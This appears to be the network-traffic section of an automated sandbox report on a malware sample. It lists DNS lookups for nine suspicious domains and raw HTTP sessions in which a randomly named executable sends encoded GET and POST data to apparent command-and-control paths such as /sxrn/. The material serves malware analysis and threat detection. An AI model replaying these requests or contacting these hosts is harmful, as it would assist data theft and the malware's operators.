                                                                                                      Nov 18, 2024 13:55:48.992316961 CET5001280192.168.2.5188.114.97.3
                                                                                                      Nov 18, 2024 13:55:49.003150940 CET5001280192.168.2.5188.114.97.3
                                                                                                      Nov 18, 2024 13:55:49.008311987 CET8050012188.114.97.3192.168.2.5
                                                                                                      Nov 18, 2024 13:55:49.915766954 CET8050012188.114.97.3192.168.2.5
                                                                                                      Nov 18, 2024 13:55:49.915952921 CET8050012188.114.97.3192.168.2.5
                                                                                                      Nov 18, 2024 13:55:49.916028976 CET5001280192.168.2.5188.114.97.3
                                                                                                      Nov 18, 2024 13:55:49.917587996 CET8050012188.114.97.3192.168.2.5
                                                                                                      Nov 18, 2024 13:55:49.917649031 CET5001280192.168.2.5188.114.97.3
                                                                                                      Nov 18, 2024 13:55:50.513958931 CET5001280192.168.2.5188.114.97.3
                                                                                                      Nov 18, 2024 13:55:51.533137083 CET5001380192.168.2.5188.114.97.3
                                                                                                      Nov 18, 2024 13:55:51.538352966 CET8050013188.114.97.3192.168.2.5
                                                                                                      Nov 18, 2024 13:55:51.539726973 CET5001380192.168.2.5188.114.97.3
                                                                                                      Nov 18, 2024 13:55:51.551079988 CET5001380192.168.2.5188.114.97.3
                                                                                                      Nov 18, 2024 13:55:51.556261063 CET8050013188.114.97.3192.168.2.5
                                                                                                      Nov 18, 2024 13:55:51.556384087 CET8050013188.114.97.3192.168.2.5
                                                                                                      Nov 18, 2024 13:55:52.522660971 CET8050013188.114.97.3192.168.2.5
                                                                                                      Nov 18, 2024 13:55:52.522773981 CET8050013188.114.97.3192.168.2.5
                                                                                                      Nov 18, 2024 13:55:52.522787094 CET8050013188.114.97.3192.168.2.5
                                                                                                      Nov 18, 2024 13:55:52.522798061 CET8050013188.114.97.3192.168.2.5
                                                                                                      Nov 18, 2024 13:55:52.522957087 CET5001380192.168.2.5188.114.97.3
                                                                                                      Nov 18, 2024 13:55:52.522957087 CET5001380192.168.2.5188.114.97.3
                                                                                                      Nov 18, 2024 13:55:53.373333931 CET5001380192.168.2.5188.114.97.3

                                                                                                      UDP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Nov 18, 2024 13:53:54.430866003 CET6323353192.168.2.51.1.1.1
                                                                                                      Nov 18, 2024 13:53:54.470120907 CET53632331.1.1.1192.168.2.5
                                                                                                      Nov 18, 2024 13:54:10.267066002 CET5659453192.168.2.51.1.1.1
                                                                                                      Nov 18, 2024 13:54:10.577837944 CET53565941.1.1.1192.168.2.5
                                                                                                      Nov 18, 2024 13:54:24.814647913 CET5087053192.168.2.51.1.1.1
                                                                                                      Nov 18, 2024 13:54:25.207626104 CET53508701.1.1.1192.168.2.5
                                                                                                      Nov 18, 2024 13:54:38.566199064 CET5924253192.168.2.51.1.1.1
                                                                                                      Nov 18, 2024 13:54:38.729506016 CET53592421.1.1.1192.168.2.5
                                                                                                      Nov 18, 2024 13:54:52.032887936 CET5962753192.168.2.51.1.1.1
                                                                                                      Nov 18, 2024 13:54:52.046222925 CET53596271.1.1.1192.168.2.5
                                                                                                      Nov 18, 2024 13:55:05.362225056 CET5970353192.168.2.51.1.1.1
                                                                                                      Nov 18, 2024 13:55:05.401372910 CET53597031.1.1.1192.168.2.5
                                                                                                      Nov 18, 2024 13:55:18.830041885 CET5517353192.168.2.51.1.1.1
                                                                                                      Nov 18, 2024 13:55:18.845366001 CET53551731.1.1.1192.168.2.5
                                                                                                      Nov 18, 2024 13:55:33.080331087 CET5055053192.168.2.51.1.1.1
                                                                                                      Nov 18, 2024 13:55:33.103272915 CET53505501.1.1.1192.168.2.5
                                                                                                      Nov 18, 2024 13:55:46.393450975 CET6381253192.168.2.51.1.1.1
                                                                                                      Nov 18, 2024 13:55:46.434787035 CET53638121.1.1.1192.168.2.5

                                                                                                      DNS Queries

                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                      Nov 18, 2024 13:53:54.430866003 CET192.168.2.51.1.1.10x5eebStandard query (0)www.habitat.rentA (IP address)IN (0x0001)false
                                                                                                      Nov 18, 2024 13:54:10.267066002 CET192.168.2.51.1.1.10x4b89Standard query (0)www.fedegaritech.onlineA (IP address)IN (0x0001)false
                                                                                                      Nov 18, 2024 13:54:24.814647913 CET192.168.2.51.1.1.10xd21fStandard query (0)www.newegg.clubA (IP address)IN (0x0001)false
                                                                                                      Nov 18, 2024 13:54:38.566199064 CET192.168.2.51.1.1.10x90a5Standard query (0)www.urssaf.proA (IP address)IN (0x0001)false
                                                                                                      Nov 18, 2024 13:54:52.032887936 CET192.168.2.51.1.1.10x186dStandard query (0)www.livelovechat.liveA (IP address)IN (0x0001)false
                                                                                                      Nov 18, 2024 13:55:05.362225056 CET192.168.2.51.1.1.10xb432Standard query (0)www.inspires.websiteA (IP address)IN (0x0001)false
                                                                                                      Nov 18, 2024 13:55:18.830041885 CET192.168.2.51.1.1.10xd0bcStandard query (0)www.tenmyk.shopA (IP address)IN (0x0001)false
                                                                                                      Nov 18, 2024 13:55:33.080331087 CET192.168.2.51.1.1.10xd550Standard query (0)www.isirumah.infoA (IP address)IN (0x0001)false
                                                                                                      Nov 18, 2024 13:55:46.393450975 CET192.168.2.51.1.1.10x1320Standard query (0)www.ssrnoremt-rise.sbsA (IP address)IN (0x0001)false

                                                                                                      DNS Answers

                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                      Nov 18, 2024 13:53:54.470120907 CET1.1.1.1192.168.2.50x5eebNo error (0)www.habitat.rent13.248.169.48A (IP address)IN (0x0001)false
                                                                                                      Nov 18, 2024 13:53:54.470120907 CET1.1.1.1192.168.2.50x5eebNo error (0)www.habitat.rent76.223.54.146A (IP address)IN (0x0001)false
                                                                                                      Nov 18, 2024 13:54:10.577837944 CET1.1.1.1192.168.2.50x4b89No error (0)www.fedegaritech.online208.91.197.27A (IP address)IN (0x0001)false
                                                                                                      Nov 18, 2024 13:54:25.207626104 CET1.1.1.1192.168.2.50xd21fNo error (0)www.newegg.club149.115.238.44A (IP address)IN (0x0001)false
                                                                                                      Nov 18, 2024 13:54:38.729506016 CET1.1.1.1192.168.2.50x90a5No error (0)www.urssaf.pro75.2.103.23A (IP address)IN (0x0001)false
                                                                                                      Nov 18, 2024 13:54:52.046222925 CET1.1.1.1192.168.2.50x186dNo error (0)www.livelovechat.livelivelovechat.liveCNAME (Canonical name)IN (0x0001)false
                                                                                                      Nov 18, 2024 13:54:52.046222925 CET1.1.1.1192.168.2.50x186dNo error (0)livelovechat.live3.33.130.190A (IP address)IN (0x0001)false
                                                                                                      Nov 18, 2024 13:54:52.046222925 CET1.1.1.1192.168.2.50x186dNo error (0)livelovechat.live15.197.148.33A (IP address)IN (0x0001)false
                                                                                                      Nov 18, 2024 13:55:05.401372910 CET1.1.1.1192.168.2.50xb432No error (0)www.inspires.website203.161.49.193A (IP address)IN (0x0001)false
                                                                                                      Nov 18, 2024 13:55:18.845366001 CET1.1.1.1192.168.2.50xd0bcNo error (0)www.tenmyk.shop104.21.74.79A (IP address)IN (0x0001)false
                                                                                                      Nov 18, 2024 13:55:18.845366001 CET1.1.1.1192.168.2.50xd0bcNo error (0)www.tenmyk.shop172.67.200.118A (IP address)IN (0x0001)false
                                                                                                      Nov 18, 2024 13:55:33.103272915 CET1.1.1.1192.168.2.50xd550No error (0)www.isirumah.info15.197.204.56A (IP address)IN (0x0001)false
                                                                                                      Nov 18, 2024 13:55:33.103272915 CET1.1.1.1192.168.2.50xd550No error (0)www.isirumah.info3.33.243.145A (IP address)IN (0x0001)false
                                                                                                      Nov 18, 2024 13:55:46.434787035 CET1.1.1.1192.168.2.50x1320No error (0)www.ssrnoremt-rise.sbs188.114.97.3A (IP address)IN (0x0001)false
                                                                                                      Nov 18, 2024 13:55:46.434787035 CET1.1.1.1192.168.2.50x1320No error (0)www.ssrnoremt-rise.sbs188.114.96.3A (IP address)IN (0x0001)false

                                                                                                      HTTP Request Dependency Graph

                                                                                                      • www.habitat.rent
                                                                                                      • www.fedegaritech.online
                                                                                                      • www.newegg.club
                                                                                                      • www.urssaf.pro
                                                                                                      • www.livelovechat.live
                                                                                                      • www.inspires.website
                                                                                                      • www.tenmyk.shop
                                                                                                      • www.isirumah.info
                                                                                                      • www.ssrnoremt-rise.sbs

                                                                                                      HTTP Packets

                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      0192.168.2.54998113.248.169.48801896C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Nov 18, 2024 13:53:54.536928892 CET485OUTGET /qamt/?3Vh=yvQMRWxE2iO5NiGttbyWAgCre54yjFUaAy+iSkz1i7eGywRcxpKEFNt/NGEMHOrlTtjc9BmVSmuvb6I2HEY7edCQWcNrZNkx1k+cySMijmBFLnX5HqbQY2Sgr5WEpsgKJA==&GLvL=i6ILStp HTTP/1.1
                                                                                                      Host: www.habitat.rent
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Nov 18, 2024 13:53:55.193813086 CET404INHTTP/1.1 200 OK
                                                                                                      Server: openresty
                                                                                                      Date: Mon, 18 Nov 2024 12:53:55 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 264
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 33 56 68 3d 79 76 51 4d 52 57 78 45 32 69 4f 35 4e 69 47 74 74 62 79 57 41 67 43 72 65 35 34 79 6a 46 55 61 41 79 2b 69 53 6b 7a 31 69 37 65 47 79 77 52 63 78 70 4b 45 46 4e 74 2f 4e 47 45 4d 48 4f 72 6c 54 74 6a 63 39 42 6d 56 53 6d 75 76 62 36 49 32 48 45 59 37 65 64 43 51 57 63 4e 72 5a 4e 6b 78 31 6b 2b 63 79 53 4d 69 6a 6d 42 46 4c 6e 58 35 48 71 62 51 59 32 53 67 72 35 57 45 70 73 67 4b 4a 41 3d 3d 26 47 4c 76 4c 3d 69 36 49 4c 53 74 70 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?3Vh=yvQMRWxE2iO5NiGttbyWAgCre54yjFUaAy+iSkz1i7eGywRcxpKEFNt/NGEMHOrlTtjc9BmVSmuvb6I2HEY7edCQWcNrZNkx1k+cySMijmBFLnX5HqbQY2Sgr5WEpsgKJA==&GLvL=i6ILStp"}</script></head></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1192.168.2.549983208.91.197.27801896C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Nov 18, 2024 13:54:10.600955009 CET761OUTPOST /sxrn/ HTTP/1.1
                                                                                                      Host: www.fedegaritech.online
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 204
                                                                                                      Connection: close
                                                                                                      Cache-Control: no-cache
                                                                                                      Origin: http://www.fedegaritech.online
                                                                                                      Referer: http://www.fedegaritech.online/sxrn/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Data Raw: 33 56 68 3d 32 32 49 58 76 47 44 66 4c 2b 33 7a 6f 45 47 70 49 71 73 75 68 45 79 59 6e 74 65 7a 4e 47 49 76 6e 45 50 72 62 74 77 75 51 53 5a 42 6e 37 4f 36 7a 4f 38 65 47 37 62 59 41 38 6a 44 6b 2f 50 5a 62 62 59 72 74 73 75 45 7a 47 4a 66 39 67 78 4e 67 34 7a 2f 4d 38 33 4a 6c 50 56 78 33 53 44 4f 67 4a 35 42 51 78 6f 65 6f 61 46 35 55 63 65 4f 54 51 30 6f 6c 63 42 41 35 46 70 4c 35 63 53 49 61 70 39 53 36 35 37 2b 4c 6d 32 51 39 51 69 55 76 30 79 52 71 78 41 78 30 70 54 62 39 4b 49 50 6c 52 64 49 38 41 42 4b 72 37 43 70 36 53 61 77 4c 6d 67 45 72 79 75 31 65 73 6f 79 6e 77 46 6d 45 33 79 6d 4f 72 63 3d
                                                                                                      Data Ascii: 3Vh=22IXvGDfL+3zoEGpIqsuhEyYntezNGIvnEPrbtwuQSZBn7O6zO8eG7bYA8jDk/PZbbYrtsuEzGJf9gxNg4z/M83JlPVx3SDOgJ5BQxoeoaF5UceOTQ0olcBA5FpL5cSIap9S657+Lm2Q9QiUv0yRqxAx0pTb9KIPlRdI8ABKr7Cp6SawLmgEryu1esoynwFmE3ymOrc=


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2192.168.2.549984208.91.197.27801896C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Nov 18, 2024 13:54:13.140285015 CET781OUTPOST /sxrn/ HTTP/1.1
                                                                                                      Host: www.fedegaritech.online
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 224
                                                                                                      Connection: close
                                                                                                      Cache-Control: no-cache
                                                                                                      Origin: http://www.fedegaritech.online
                                                                                                      Referer: http://www.fedegaritech.online/sxrn/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Data Raw: 33 56 68 3d 32 32 49 58 76 47 44 66 4c 2b 33 7a 6f 6b 32 70 4b 49 45 75 30 55 79 62 37 39 65 7a 45 6d 4a 6f 6e 45 44 72 62 73 45 41 58 6b 78 42 6b 61 2b 36 68 66 38 65 46 37 62 59 59 4d 6a 38 36 50 50 48 62 62 63 6a 74 73 53 45 7a 46 31 66 39 67 68 4e 6a 50 48 77 4d 73 33 4c 6b 2f 56 76 6f 43 44 4f 67 4a 35 42 51 31 41 34 6f 61 74 35 55 73 4f 4f 53 30 59 6e 37 4d 41 79 77 6c 70 4c 79 38 53 79 61 70 39 77 36 34 33 48 4c 67 79 51 39 53 36 55 76 67 65 53 68 78 41 72 71 5a 53 6f 79 66 68 6d 39 78 4a 70 30 53 55 53 36 5a 4f 4e 32 45 72 61 52 45 6f 73 34 53 43 4e 4f 2f 67 46 32 41 6b 50 65 55 69 57 51 38 49 2f 59 61 46 69 66 51 70 49 48 73 2f 65 43 48 73 74 76 76 70 52
                                                                                                      Data Ascii: 3Vh=22IXvGDfL+3zok2pKIEu0Uyb79ezEmJonEDrbsEAXkxBka+6hf8eF7bYYMj86PPHbbcjtsSEzF1f9ghNjPHwMs3Lk/VvoCDOgJ5BQ1A4oat5UsOOS0Yn7MAywlpLy8Syap9w643HLgyQ9S6UvgeShxArqZSoyfhm9xJp0SUS6ZON2EraREos4SCNO/gF2AkPeUiWQ8I/YaFifQpIHs/eCHstvvpR


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      3192.168.2.549985208.91.197.27801896C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Nov 18, 2024 13:54:15.692220926 CET1798OUTPOST /sxrn/ HTTP/1.1
                                                                                                      Host: www.fedegaritech.online
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 1240
                                                                                                      Connection: close
                                                                                                      Cache-Control: no-cache
                                                                                                      Origin: http://www.fedegaritech.online
                                                                                                      Referer: http://www.fedegaritech.online/sxrn/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Data Raw: 33 56 68 3d 32 32 49 58 76 47 44 66 4c 2b 33 7a 6f 6b 32 70 4b 49 45 75 30 55 79 62 37 39 65 7a 45 6d 4a 6f 6e 45 44 72 62 73 45 41 58 6b 35 42 6b 70 6d 36 7a 73 55 65 45 37 62 59 47 38 6a 39 36 50 4f 62 62 61 34 6e 74 73 66 37 7a 44 78 66 37 44 5a 4e 69 36 72 77 56 63 33 4c 68 50 56 79 33 53 44 66 67 4b 42 61 51 78 73 34 6f 61 74 35 55 71 4b 4f 43 51 30 6e 35 4d 42 41 35 46 70 58 35 63 54 64 61 70 6c 4b 36 34 6a 58 4d 52 4f 51 39 78 43 55 75 56 79 53 73 78 41 74 72 5a 53 77 79 66 6c 39 39 77 6c 62 30 54 67 34 36 61 75 4e 7a 69 79 47 4c 30 74 32 75 30 50 68 45 4e 63 31 76 41 73 75 58 30 61 4c 51 72 6f 38 65 50 39 6e 49 6b 64 56 54 49 43 56 65 54 6f 70 39 4c 34 53 37 42 6c 77 39 44 5a 69 6f 31 6f 43 79 35 69 4b 62 78 79 4d 68 58 6b 6e 4e 4a 6c 56 4f 53 71 69 68 43 46 56 48 59 63 32 56 57 50 6f 68 5a 61 49 74 39 49 51 63 6f 42 48 46 45 48 4d 77 36 66 49 42 5a 53 79 58 38 55 66 67 31 79 39 52 37 58 32 47 77 78 4f 5a 38 33 55 50 34 34 2b 31 6e 62 52 2b 43 7a 4a 41 51 54 47 70 2b 65 48 66 6e 30 2b 6e 31 [TRUNCATED]
                                                                                                      Data Ascii: 3Vh=22IXvGDfL+3zok2pKIEu0Uyb79ezEmJonEDrbsEAXk5Bkpm6zsUeE7bYG8j96PObba4ntsf7zDxf7DZNi6rwVc3LhPVy3SDfgKBaQxs4oat5UqKOCQ0n5MBA5FpX5cTdaplK64jXMROQ9xCUuVySsxAtrZSwyfl99wlb0Tg46auNziyGL0t2u0PhENc1vAsuX0aLQro8eP9nIkdVTICVeTop9L4S7Blw9DZio1oCy5iKbxyMhXknNJlVOSqihCFVHYc2VWPohZaIt9IQcoBHFEHMw6fIBZSyX8Ufg1y9R7X2GwxOZ83UP44+1nbR+CzJAQTGp+eHfn0+n1cIi/Qc/da2at9mAFP3GtK4LEAIkoygT+2ieete4tVp4QkDpIU3S0fRYEFtJd0JqaMB4x6+VvoNgOB0q5nIIbqHQ6Xveiy/QtSmFTnhJo+4cXeoH49jzfytyAJlUqeylirRfmFzr7dtKe7rOdMylG6kc8EJoYDga3Vm1cDWiauQpg1m8UsUBnpCZbd87wNXPFozFLsg3pjLls5gFwVJfUNsW5VkzVyhn2oCFyN6gWB34S8m0AYCA0gOBWGxKpSU/phrvCNtzYj5XMlmyvJH8tPQWTFVFat3REwQrfIbNdmrSVgUhcX+mgppk5RfAYbjxtXuw9SC9wUdjr/UsOnIbkBj/UMNJnrGv6sVacetByxbOIrXhRTgOEUDv0Ic50J6OLROtV5+M7TEjHSHIk7b2UvMiIocVzF/7ExYgI6evJ82uwclks4MV2aySYYZ5jEyIxtha1IF2ayx69bP5BvkT2sXtEEpjjxFdI2KDmYBhcO4d6yUoYmLo30zQ7zlr+lCByALiW8cDgqnpVrERbUA7ZOiIekKdhOtkNyTJErPsYkM3+jT/Tt9yzpxsGewsxMfeA88OtDpGBQgDLftpZMt4DPZ/9qamyC6IG/6y6QifSYRMu/d65tzzWlZhIePtG+ZSl5Re8ZizmeOpqvjG1f+So/zPljTH+4MgDfn [TRUNCATED]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      4192.168.2.549986208.91.197.27801896C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Nov 18, 2024 13:54:18.240345001 CET492OUTGET /sxrn/?3Vh=70g3synrMt+mv3bMA5M2pxuaxfXYXBcuz2rDMeB4YhlIhpmz1+c2ZYK3A+er04ehZbUUhJrT7mt7qDpgqvLlNMW5io5Y2wz+3pIWYjAXlaRVZqa6aRI+hdIryUt+yvXWOw==&GLvL=i6ILStp HTTP/1.1
                                                                                                      Host: www.fedegaritech.online
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Nov 18, 2024 13:54:19.559350014 CET1236INHTTP/1.1 200 OK
                                                                                                      Date: Mon, 18 Nov 2024 12:54:18 GMT
                                                                                                      Server: Apache
                                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                                      Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                      Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                      X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_AlfK+yS335P+Fe8DNIB/CuGkJLw4/hlfKrh6u4sHnFKtmb0ItycNk/D+8wjO6prGoOAvakxCtpn990JzUTPBhw==
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Connection: close
                                                                                                      Data Raw: 61 33 65 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64 69 6e 69 66 72 61 6d 65 20 3d 20 74 72 75 65 3b 20 69 66 28 [TRUNCATED]
                                                                                                      Data Ascii: a3e0<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net"> <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprApp
                                                                                                      Nov 18, 2024 13:54:19.559485912 CET1236INData Raw: 6c 69 65 73 47 6c 6f 62 61 6c 6c 79 3d 74 72 75 65 7d 69 66 28 21 28 22 63 6d 70 5f 69 64 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 77 69 6e 64 6f 77 2e 63 6d 70 5f 69 64 3c 31 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 69 64 3d 30 7d 69 66 28 21 28
                                                                                                      Data Ascii: liesGlobally=true}if(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)){window.cmp_cdid="21fdca2281833"}if(!("cmp_params" in window)){window.cmp_params=""}if(!("cmp_host" in window)){window.cmp_host="a.delivery
                                                                                                      Nov 18, 2024 13:54:19.559498072 CET1236INData Raw: 6e 64 6f 77 2e 63 6d 70 5f 67 65 74 73 75 70 70 6f 72 74 65 64 4c 61 6e 67 73 28 29 3b 76 61 72 20 63 3d 5b 5d 3b 76 61 72 20 66 3d 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 3b 76 61 72 20 65 3d 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 76 61
                                                                                                      Data Ascii: ndow.cmp_getsupportedLangs();var c=[];var f=location.hash;var e=location.search;var a="languages" in navigator?navigator.languages:[];if(f.indexOf("cmplang=")!=-1){c.push(f.substr(f.indexOf("cmplang=")+8,2).toUpperCase())}else{if(e.indexOf("cm
                                                                                                      Nov 18, 2024 13:54:19.559509993 CET1236INData Raw: 6e 63 74 69 6f 6e 20 78 28 69 2c 65 29 7b 76 61 72 20 77 3d 22 22 3b 69 2b 3d 22 3d 22 3b 76 61 72 20 73 3d 69 2e 6c 65 6e 67 74 68 3b 76 61 72 20 64 3d 6c 6f 63 61 74 69 6f 6e 3b 69 66 28 64 2e 68 61 73 68 2e 69 6e 64 65 78 4f 66 28 69 29 21 3d
                                                                                                      Data Ascii: nction x(i,e){var w="";i+="=";var s=i.length;var d=location;if(d.hash.indexOf(i)!=-1){w=d.hash.substr(d.hash.indexOf(i)+s,9999)}else{if(d.search.indexOf(i)!=-1){w=d.search.substr(d.search.indexOf(i)+s,9999)}else{return e}}if(w.indexOf("&")!=-1
                                                                                                      Nov 18, 2024 13:54:19.559583902 CET548INData Raw: 63 75 72 72 65 6e 74 53 63 72 69 70 74 26 26 75 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 29 7b 75 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 2e 61 70 70 65 6e 64
                                                                                                      Data Ascii: currentScript&&u.currentScript.parentElement){u.currentScript.parentElement.appendChild(j)}else{if(u.body){u.body.appendChild(j)}else{var t=v("body");if(t.length==0){t=v("div")}if(t.length==0){t=v("span")}if(t.length==0){t=v("ins")}if(t.length
                                                                                                      Nov 18, 2024 13:54:19.559597015 CET1236INData Raw: 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 6a 2e 73 72 63 3d 6b 2b 22 2f 2f 22 2b 68 2e 63 6d 70 5f 63 64 6e 2b 22 2f 64 65 6c 69 76 65 72 79 2f 22 2b 6d 2b 22 2f 63 6d 70 22 2b 62 2b 70 2b 22 2e 6a 73 22 3b 6a 2e
                                                                                                      Data Ascii: .createElement("script");j.src=k+"//"+h.cmp_cdn+"/delivery/"+m+"/cmp"+b+p+".js";j.type="text/javascript";j.setAttribute("data-cmp-ab","1");j.async=true;if(u.currentScript&&u.currentScript.parentElement){u.currentScript.parentElement.appendChil
